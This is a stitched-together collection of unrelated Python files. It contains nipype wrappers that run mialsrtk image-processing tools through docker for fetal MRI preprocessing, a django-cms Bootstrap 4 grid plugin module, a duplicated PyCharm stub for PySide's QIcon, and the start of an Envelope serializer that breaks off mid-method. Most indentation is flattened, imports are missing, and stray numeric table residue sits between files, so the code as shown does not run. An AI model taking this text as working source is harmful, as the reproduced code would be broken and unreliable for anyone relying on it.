from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import traits, isdefined, CommandLine, CommandLineInputSpec,\
TraitedSpec, File, InputMultiPath, OutputMultiPath, BaseInterface, BaseInterfaceInputSpec
from pymialsrtk.interfaces.utils import run
#
## NLM denoising
#
class BtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_nlm", usedefault=True)
weight = traits.Float(0.1,desc='NLM weight (0.1 by default)')
class BtkNLMDenoisingOutputSpec(TraitedSpec):
out_file = File(desc='Denoised image')
class BtkNLMDenoising(BaseInterface):
input_spec = BtkNLMDenoisingInputSpec
output_spec = BtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#out_file = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
uid = os.getuid()
gid = os.getgid()
cmd = []
cmd.append("docker run --rm -u {}:{}".format(uid,gid))
cmd.append("--volumes-from sinapp_nlmdenoise")
cmd.append("sebastientourbier/mialsuperresolutiontoolkit btkNLMDenoising")
cmd.append("-i {} -o {} -b {}".format(self.inputs.in_file,out_file,self.inputs.weight))
if self.inputs.in_mask:
cmd.append("-m {}".format(self.inputs.in_mask))
try:
print('... cmd: {}'.format(cmd))
p = run(' '.join(cmd), env={}, cwd=os.path.abspath(self.inputs.bids_dir))
print(p)
        except Exception as e:
            print('Failed: {}'.format(e))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#outputs['out_file'] = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
outputs['out_file'] = os.path.join(os.getcwd(), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
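
# Usage sketch (hypothetical paths; assumes the sebastientourbier/mialsuperresolutiontoolkit
# docker image and a data container named 'sinapp_nlmdenoise' are available, as the
# command built above expects):
#   nlm = BtkNLMDenoising(bids_dir='/fetaldata',
#                         in_file='/fetaldata/sub-01_run-1_T2w.nii.gz',
#                         weight=0.1)
#   result = nlm.run()  # denoised image path reported in result.outputs.out_file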
class MultipleBtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be denoised', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be denoised', mandatory = False))
weight = traits.Float(0.1)
out_postfix = traits.Str("_nlm", usedefault=True)
class MultipleBtkNLMDenoisingOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleBtkNLMDenoising(BaseInterface):
input_spec = MultipleBtkNLMDenoisingInputSpec
output_spec = MultipleBtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
if len(self.inputs.input_masks)>0:
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
else:
for input_image in self.inputs.input_images:
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice intensity correction
#
class MialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_csi", usedefault=True)
class MialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
out_file = File(desc='Corrected slice intensities')
class MialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MialsrtkCorrectSliceIntensityInputSpec
output_spec = MialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
cmd = 'mialsrtkCorrectSliceIntensity "{}" "{}" "{}"'.format(self.inputs.in_file,self.inputs.in_mask,out_file)
        try:
            print('... cmd: {}'.format(cmd))
            run(cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
        except Exception as e:
            print('Failed: {}'.format(e))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = False))
out_postfix = traits.Str("_csi", usedefault=True)
class MultipleMialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MultipleMialsrtkCorrectSliceIntensityInputSpec
output_spec = MultipleMialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
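        # Note: input_masks is declared optional in the spec, but this loop pairs
        # images and masks with zip(); if no masks are supplied, zip() yields
        # nothing and no image is processed.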
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkCorrectSliceIntensity(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice by slice N4 bias field correction
#
class MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=True)
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
out_im_file = File(desc='Corrected slice by slice from N4 bias field')
out_fld_file = File(desc='slice by slice N4 bias field')
class MialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_im_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
out_fld_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
cmd = 'mialsrtkSliceBySliceN4BiasFieldCorrection "{}" "{}" "{}" "{}"'.format(self.inputs.in_file, self.inputs.in_mask, out_im_file, out_fld_file)
        try:
            print('... cmd: {}'.format(cmd))
            run(cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
        except Exception as e:
            print('Failed: {}'.format(e))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_im_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_im_postfix, ext)))
outputs['out_fld_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_fld_postfix, ext)))
return outputs
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be corrected for intensity', mandatory = True))
out_im_postfix = traits.Str("_sliceN4corr", usedefault=True)
out_fld_postfix = traits.Str("_sliceN4field", usedefault=True)
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
output_fields = OutputMultiPath(File())
class MultipleMialsrtkSliceBySliceN4BiasFieldCorrection(BaseInterface):
input_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionInputSpec
output_spec = MultipleMialsrtkSliceBySliceN4BiasFieldCorrectionOutputSpec
def _run_interface(self, runtime):
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = MialsrtkSliceBySliceN4BiasFieldCorrection(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_im_postfix=self.inputs.out_im_postfix, out_fld_postfix=self.inputs.out_fld_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*_sliceN4corr.nii.gz"))
outputs['output_fields'] = glob(os.path.abspath("*_sliceN4field.nii.gz"))
return outputs
#
## Intensity standardization
#
class MialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
out_file = File(desc='Intensities standardized')
class MialsrtkIntensityStandardization(BaseInterface):
input_spec = MialsrtkIntensityStandardizationInputSpec
output_spec = MialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
        if isdefined(self.inputs.in_max):
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}" --max "{}"'.format(self.inputs.in_file, out_file,self.inputs.in_max)
else:
cmd = 'mialsrtkIntensityStandardization --input "{}" --output "{}"'.format(self.inputs.in_file, out_file)
        try:
            print('... cmd: {}'.format(cmd))
            run(cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
        except Exception as e:
            print('Failed: {}'.format(e))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
outputs['out_file'] = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleMialsrtkIntensityStandardizationInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be corrected for intensity', mandatory = True))
out_postfix = traits.Str("_ist", usedefault=True)
in_max = traits.Float(usedefault=False)
class MultipleMialsrtkIntensityStandardizationOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleMialsrtkIntensityStandardization(BaseInterface):
input_spec = MultipleMialsrtkIntensityStandardizationInputSpec
output_spec = MultipleMialsrtkIntensityStandardizationOutputSpec
def _run_interface(self, runtime):
for input_image in self.inputs.input_images:
print("input_image", input_image)
            if isdefined(self.inputs.in_max):
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, in_max=self.inputs.in_max)
else:
ax = MialsrtkIntensityStandardization(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
        return outputs

# Source: pymialsrtk/interfaces/preprocess.py
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms import widgets
from django.forms.fields import ChoiceField
from django.forms.models import ModelForm
from django.utils.html import format_html
from django.utils.encoding import force_text
from django.utils.translation import ungettext_lazy, ugettext_lazy as _
from cms.plugin_pool import plugin_pool
from cmsplugin_cascade import app_settings
from cmsplugin_cascade.forms import ManageChildrenFormMixin
from cmsplugin_cascade.fields import GlossaryField
from .plugin_base import BootstrapPluginBase
from . import grid
def get_widget_choices():
breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
widget_choices = []
for index, (bp, bound) in enumerate(breakpoints.items()):
if index == 0:
widget_choices.append((bp.name, "{} (<{:.1f}px)".format(bp.label, bound.max)))
elif index == len(breakpoints) - 1:
widget_choices.append((bp.name, "{} (≥{:.1f}px)".format(bp.label, bound.min)))
else:
widget_choices.append((bp.name, "{} (≥{:.1f}px and <{:.1f}px)".format(bp.label, bound.min, bound.max)))
return widget_choices
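
# Example result (illustrative only; actual labels and pixel bounds depend on the
# CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds'] setting):
#   [('xs', 'Extra small (<576.0px)'),
#    ('sm', 'Small (≥576.0px and <768.0px)'),
#    ...
#    ('xl', 'Extra large (≥1200.0px)')]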
class ContainerBreakpointsWidget(widgets.CheckboxSelectMultiple):
template_name = 'cascade/forms/widgets/container_breakpoints.html'
def render(self, name, value, attrs=None, renderer=None):
attrs = dict(attrs, version=4)
return super(ContainerBreakpointsWidget, self).render(name, value, attrs, renderer)
class BootstrapContainerForm(ModelForm):
"""
Form class to validate the container.
"""
def clean_glossary(self):
if len(self.cleaned_data['glossary']['breakpoints']) == 0:
raise ValidationError(_("At least one breakpoint must be selected."))
return self.cleaned_data['glossary']
class ContainerGridMixin(object):
def get_grid_instance(self):
fluid = self.glossary.get('fluid', False)
try:
breakpoints = [getattr(grid.Breakpoint, bp) for bp in self.glossary['breakpoints']]
except KeyError:
breakpoints = [bp for bp in grid.Breakpoint]
if fluid:
bounds = dict((bp, grid.fluid_bounds[bp]) for bp in breakpoints)
else:
bounds = dict((bp, grid.default_bounds[bp]) for bp in breakpoints)
return grid.Bootstrap4Container(bounds=bounds)
class BootstrapContainerPlugin(BootstrapPluginBase):
name = _("Container")
parent_classes = None
require_parent = False
form = BootstrapContainerForm
glossary_variables = ['container_max_widths', 'media_queries']
glossary_field_order = ['breakpoints', 'fluid']
model_mixins = (ContainerGridMixin,)
breakpoints = GlossaryField(
ContainerBreakpointsWidget(choices=get_widget_choices()),
label=_('Available Breakpoints'),
initial=[bp.name for bp in app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds'].keys()],
help_text=_("Supported display widths for Bootstrap's grid system."),
)
fluid = GlossaryField(
widgets.CheckboxInput(),
label=_('Fluid Container'), initial=False,
help_text=_("Changing your outermost '.container' to '.container-fluid'.")
)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapContainerPlugin, cls).get_identifier(obj)
        breakpoints = obj.glossary.get('breakpoints')
        content = '(fluid) ' if obj.glossary.get('fluid') else ''
        if breakpoints:
            # Restrict the listed devices to the breakpoints selected for this container.
            bounds = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
            devices = ', '.join([force_text(bp.label) for bp in bounds if bp.name in breakpoints])
content = _("{0}for {1}").format(content, devices)
return format_html('{0}{1}', identifier, content)
@classmethod
def get_css_classes(cls, obj):
        css_classes = super(BootstrapContainerPlugin, cls).get_css_classes(obj)
if obj.glossary.get('fluid'):
css_classes.append('container-fluid')
else:
css_classes.append('container')
return css_classes
def save_model(self, request, obj, form, change):
super(BootstrapContainerPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
plugin_pool.register_plugin(BootstrapContainerPlugin)
class BootstrapRowForm(ManageChildrenFormMixin, ModelForm):
"""
Form class to add non-materialized field to count the number of children.
"""
ROW_NUM_COLUMNS = [1, 2, 3, 4, 6, 12]
num_children = ChoiceField(
choices=[(i, ungettext_lazy('{0} column', '{0} columns', i).format(i)) for i in ROW_NUM_COLUMNS],
initial=3, label=_('Columns'),
help_text=_('Number of columns to be created with this row.'))
class RowGridMixin(object):
def get_grid_instance(self):
row = grid.Bootstrap4Row()
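        # Walk up the plugin tree to the nearest element that can host a row
        # (container, column or jumbotron) and attach this row to its grid.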
query = Q(plugin_type='BootstrapContainerPlugin') | Q(plugin_type='BootstrapColumnPlugin') \
| Q(plugin_type='BootstrapJumbotronPlugin')
container = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin().get_grid_instance()
container.add_row(row)
return row
class BootstrapRowPlugin(BootstrapPluginBase):
name = _("Row")
default_css_class = 'row'
parent_classes = ['BootstrapContainerPlugin', 'BootstrapColumnPlugin', 'BootstrapJumbotronPlugin']
form = BootstrapRowForm
fields = ['num_children', 'glossary']
model_mixins = (RowGridMixin,)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapRowPlugin, cls).get_identifier(obj)
num_cols = obj.get_num_children()
content = ungettext_lazy("with {0} column", "with {0} columns", num_cols).format(num_cols)
return format_html('{0}{1}', identifier, content)
def save_model(self, request, obj, form, change):
wanted_children = int(form.cleaned_data.get('num_children'))
super(BootstrapRowPlugin, self).save_model(request, obj, form, change)
child_glossary = {'xs-column-width': 'col'}
self.extend_children(obj, wanted_children, BootstrapColumnPlugin, child_glossary=child_glossary)
plugin_pool.register_plugin(BootstrapRowPlugin)
class ColumnGridMixin(object):
    valid_keys = ['xs-column-width', 'sm-column-width', 'md-column-width', 'lg-column-width', 'xl-column-width',
                  'xs-column-offset', 'sm-column-offset', 'md-column-offset', 'lg-column-offset', 'xl-column-offset']
def get_grid_instance(self):
column = None
query = Q(plugin_type='BootstrapRowPlugin')
row_obj = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin()
# column_siblings = row_obj.get_descendants().order_by('depth').filter(plugin_type='BootstrapColumnPlugin')
row = row_obj.get_grid_instance()
for column_sibling in self.get_siblings():
classes = [val for key, val in column_sibling.get_bound_plugin().glossary.items()
if key in self.valid_keys and val]
if column_sibling.pk == self.pk:
column = grid.Bootstrap4Column(classes)
row.add_column(column)
else:
row.add_column(grid.Bootstrap4Column(classes))
return column
class BootstrapColumnPlugin(BootstrapPluginBase):
name = _("Column")
parent_classes = ('BootstrapRowPlugin',)
child_classes = ('BootstrapJumbotronPlugin',)
alien_child_classes = True
default_css_attributes = [fmt.format(bp.name) for bp in grid.Breakpoint
for fmt in ('{}-column-width', '{}-column-offset', '{}-column-ordering', '{}-responsive-utils')]
glossary_variables = ['container_max_widths']
model_mixins = (ColumnGridMixin,)
def get_form(self, request, obj=None, **kwargs):
def choose_help_text(*phrases):
bounds = 'fluid_bounds' if container.glossary.get('fluid') else 'default_bounds'
bs4_breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4'][bounds]
if last:
return phrases[0].format(bs4_breakpoints[last].max)
elif len(breakpoints) > 1:
return phrases[1].format(bs4_breakpoints[first].min)
else:
return phrases[2]
        if 'parent' in self._cms_initial_attributes:
            container = self._cms_initial_attributes['parent'].get_ancestors().order_by('depth').last().get_bound_plugin()
        else:
            containers = obj.get_ancestors().filter(plugin_type='BootstrapContainerPlugin')
            if containers:
                container = containers.order_by('depth').last().get_bound_plugin()
            else:
                jumbotrons = obj.get_ancestors().filter(plugin_type='BootstrapJumbotronPlugin')
                container = jumbotrons.order_by('depth').last().get_bound_plugin()
breakpoints = container.glossary['breakpoints']
glossary_fields = []
units = [ungettext_lazy("{} unit", "{} units", i).format(i) for i in range(0, 13)]
for bp in breakpoints:
try:
last = getattr(grid.Breakpoint, breakpoints[breakpoints.index(bp) + 1])
except IndexError:
last = None
finally:
first = getattr(grid.Breakpoint, bp)
devices = ', '.join([force_text(b.label) for b in grid.Breakpoint.range(first, last)])
if bp == 'xs':
choices = [('col', _("Flex column"))]
choices.extend(('col-{}'.format(i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-auto', _("Auto column")))
else:
choices = [('col-{}'.format(bp), _("Flex column"))]
choices.extend(('col-{}-{}'.format(bp, i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-{}-auto'.format(bp), _("Auto column")))
if breakpoints.index(bp) == 0:
# first breakpoint
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='col-{}-12'.format(bp),
help_text=choose_help_text(
_("Column width for devices narrower than {:.1f} pixels."),
_("Column width for devices wider than {:.1f} pixels."),
_("Column width for all devices."),
)
))
else:
# wider breakpoints may inherit from next narrower ones
choices.insert(0, ('', _("Inherit from above")))
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='',
help_text=choose_help_text(
_("Override column width for devices narrower than {:.1f} pixels."),
_("Override column width for devices wider than {:.1f} pixels."),
_("Override column width for all devices."),
)
))
# handle offset
if breakpoints.index(bp) == 0:
choices = [('', _("No offset"))]
offset_range = range(1, 13)
else:
choices = [('', _("Inherit from above"))]
offset_range = range(0, 13)
if bp == 'xs':
choices.extend(('offset-{}'.format(i), units[i]) for i in offset_range)
else:
choices.extend(('offset-{}-{}'.format(bp, i), units[i]) for i in offset_range)
label = _("Offset for {}").format(devices)
help_text = choose_help_text(
_("Offset width for devices narrower than {:.1f} pixels."),
_("Offset width for devices wider than {:.1f} pixels."),
_("Offset width for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-offset'.format(bp),
help_text=help_text))
# handle column reordering
choices = [('', _("No reordering"))]
if bp == 'xs':
choices.extend(('order-{}'.format(i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
else:
choices.extend(('order-{}-{}'.format(bp, i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
label = _("Reordering for {}").format(devices)
help_text = choose_help_text(
_("Reordering for devices narrower than {:.1f} pixels."),
_("Reordering for devices wider than {:.1f} pixels."),
_("Reordering for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-ordering'.format(bp),
help_text=help_text))
# handle responsive utilities
choices = [('', _("Default")), ('visible-{}'.format(bp), _("Visible")), ('hidden-{}'.format(bp), _("Hidden"))]
label = _("Responsive utilities for {}").format(devices)
help_text = choose_help_text(
_("Utility classes for showing and hiding content by devices narrower than {:.1f} pixels."),
_("Utility classes for showing and hiding content by devices wider than {:.1f} pixels."),
_("Utility classes for showing and hiding content for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.RadioSelect(choices=choices),
label=label,
name='{}-responsive-utils'.format(bp),
initial='',
help_text=help_text))
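        # The loop above appends fields breakpoint-major (width, offset, ordering,
        # responsive utils for each breakpoint in turn); regroup them field-major
        # so that, e.g., all column-width selects line up across breakpoints.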
glossary_fields = [
glossary_fields[i + len(glossary_fields) // len(breakpoints) * j]
for i in range(0, len(glossary_fields) // len(breakpoints))
for j in range(0, len(breakpoints))
]
kwargs.update(glossary_fields=glossary_fields)
return super(BootstrapColumnPlugin, self).get_form(request, obj, **kwargs)
def save_model(self, request, obj, form, change):
super(BootstrapColumnPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
@classmethod
def sanitize_model(cls, obj):
sanitized = super(BootstrapColumnPlugin, cls).sanitize_model(obj)
return sanitized
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapColumnPlugin, cls).get_identifier(obj)
glossary = obj.get_complete_glossary()
widths = []
for bp in glossary.get('breakpoints', []):
width = obj.glossary.get('{0}-column-width'.format(bp), '').replace('col-{0}-'.format(bp), '')
if width:
widths.append(width)
if len(widths) > 1:
content = _('widths: {0} units').format(' / '.join(widths))
elif len(widths) == 1:
width = widths[0]
content = ungettext_lazy('default width: {0} unit', 'default width: {0} units', width).format(width)
else:
content = _('unknown width')
return format_html('{0}{1}', identifier, content)
plugin_pool.register_plugin(BootstrapColumnPlugin)

# Source: cmsplugin_cascade/bootstrap4/container.py
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QIcon(__Shiboken.Object):
# no doc
def actualSize(self, *args, **kwargs): # real signature unknown
pass
def addFile(self, *args, **kwargs): # real signature unknown
pass
def addPixmap(self, *args, **kwargs): # real signature unknown
pass
def availableSizes(self, *args, **kwargs): # real signature unknown
pass
def cacheKey(self, *args, **kwargs): # real signature unknown
pass
def fromTheme(self, *args, **kwargs): # real signature unknown
pass
def hasThemeIcon(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def paint(self, *args, **kwargs): # real signature unknown
pass
def pixmap(self, *args, **kwargs): # real signature unknown
pass
def setThemeName(self, *args, **kwargs): # real signature unknown
pass
def setThemeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def swap(self, *args, **kwargs): # real signature unknown
pass
def themeName(self, *args, **kwargs): # real signature unknown
pass
def themeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __lshift__(self, y): # real signature unknown; restored from __doc__
""" x.__lshift__(y) <==> x<<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
def __rlshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rlshift__(y) <==> y<<x """
pass
def __rrshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rrshift__(y) <==> y>>x """
pass
def __rshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rshift__(y) <==> x>>y """
pass
Active = PySide.QtGui.QIcon.Mode.Active
Disabled = PySide.QtGui.QIcon.Mode.Disabled
Mode = None # (!) real value is "<type 'PySide.QtGui.QIcon.Mode'>"
Normal = PySide.QtGui.QIcon.Mode.Normal
Off = PySide.QtGui.QIcon.State.Off
On = PySide.QtGui.QIcon.State.On
Selected = PySide.QtGui.QIcon.Mode.Selected
    State = None # (!) real value is "<type 'PySide.QtGui.QIcon.State'>"

# Source: resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QIcon.py
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QIcon(__Shiboken.Object):
# no doc
def actualSize(self, *args, **kwargs): # real signature unknown
pass
def addFile(self, *args, **kwargs): # real signature unknown
pass
def addPixmap(self, *args, **kwargs): # real signature unknown
pass
def availableSizes(self, *args, **kwargs): # real signature unknown
pass
def cacheKey(self, *args, **kwargs): # real signature unknown
pass
def fromTheme(self, *args, **kwargs): # real signature unknown
pass
def hasThemeIcon(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def paint(self, *args, **kwargs): # real signature unknown
pass
def pixmap(self, *args, **kwargs): # real signature unknown
pass
def setThemeName(self, *args, **kwargs): # real signature unknown
pass
def setThemeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def swap(self, *args, **kwargs): # real signature unknown
pass
def themeName(self, *args, **kwargs): # real signature unknown
pass
def themeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __lshift__(self, y): # real signature unknown; restored from __doc__
""" x.__lshift__(y) <==> x<<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
def __rlshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rlshift__(y) <==> y<<x """
pass
def __rrshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rrshift__(y) <==> y>>x """
pass
def __rshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rshift__(y) <==> x>>y """
pass
Active = PySide.QtGui.QIcon.Mode.Active
Disabled = PySide.QtGui.QIcon.Mode.Disabled
Mode = None # (!) real value is "<type 'PySide.QtGui.QIcon.Mode'>"
Normal = PySide.QtGui.QIcon.Mode.Normal
Off = PySide.QtGui.QIcon.State.Off
On = PySide.QtGui.QIcon.State.On
Selected = PySide.QtGui.QIcon.Mode.Selected
State = None # (!) real value is "<type 'PySide.QtGui.QIcon.State'>" | 0.528777 | 0.084833 |
import io
import sys
import json
import shutil
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode # NOQA
else:
text_type = str
class Envelope(object):
def __init__(self, headers=None, items=None):
if headers is not None:
headers = dict(headers)
self.headers = headers or {}
if items is None:
items = []
else:
items = list(items)
self.items = items
def add_item(self, item):
self.items.append(item)
def get_event(self):
for item in self.items:
event = item.get_event()
if event is not None:
return event
def __iter__(self):
return iter(self.items)
def serialize_into(self, f):
f.write(json.dumps(self.headers).encode("utf-8"))
f.write(b"\n")
for item in self.items:
item.serialize_into(f)
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
headers = json.loads(f.readline())
items = []
while 1:
item = Item.deserialize_from(f)
if item is None:
break
items.append(item)
return cls(headers=headers, items=items)
@classmethod
def deserialize(cls, bytes):
